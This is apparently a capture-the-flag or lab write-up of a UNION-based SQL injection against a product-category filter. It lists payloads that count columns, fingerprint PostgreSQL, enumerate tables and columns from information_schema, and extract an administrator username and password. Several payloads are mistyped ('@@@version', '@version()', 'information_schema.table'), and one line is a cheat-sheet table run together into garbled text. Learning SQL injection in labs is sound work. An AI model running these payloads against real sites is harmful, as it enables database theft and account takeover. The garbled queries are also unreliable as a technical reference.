SQL injection attack, listing the database contents on non-Oracle databases
Step 1: Go to the product category to ensure whether this is SQL injection vulnerable or not. If it shows ‘Internal Server error Or HTTP request 500 ‘, it means this site is SQL injection vulnerable.
Step2: To check the number of columns, we run the injection query
‘ order by 1- -
It responds to HTTP 200. That means the database has at least 1 column.
‘ order by 2- -
It also responds to HTTP 200. That means the database has at least 2 columns.
‘ order by 3- -
It responds to HTTP 500 & internal server errors. That means the database doesn’t contain 3 columns.
It is noted that every time when we inject a vulnerable query on the category filter we have to encode the query by pressing Ctrl+U (URL encoding).
Step3: To find out which database version it is,
‘UNION SELECT @@@version ,null — -
It responds to 500HTTP bad requests, so we ensure that the site database doesn’t have Microsoft. version. Now you run the PostgreSQL query:
MicrosoftSELECT @@versionPostgreSQLSELECT version()MySQLSELECT @@version
‘UNION SELECT @version() ,null — -
It responds to 200 HTTP OK requests, so we ensure the site database is PostgreSQL. In the column, we can see the version name.
Step 4: For output the list of the tables on the columns :
‘UNION SELECT table_name, NULL from information_schema.table — -
it outputs many of the tables contain. we need the user table and that is users_pvqzbm
Step 5: Output the column names of the tables
‘UNION SELECT column_name, NULL from information_schema.columns WHERE table_name =’users_pvqzbm’ — -
It shows the database:
- username_jtnnkn
- password_nlwkhx
Step 6: For retrieving username and password
‘Union Select username_jtnnkn, password_nlwkhx from users_pvqzbm- -
username: administrator
password: hzqr473zb2niyr9rs587
#HappyHacking
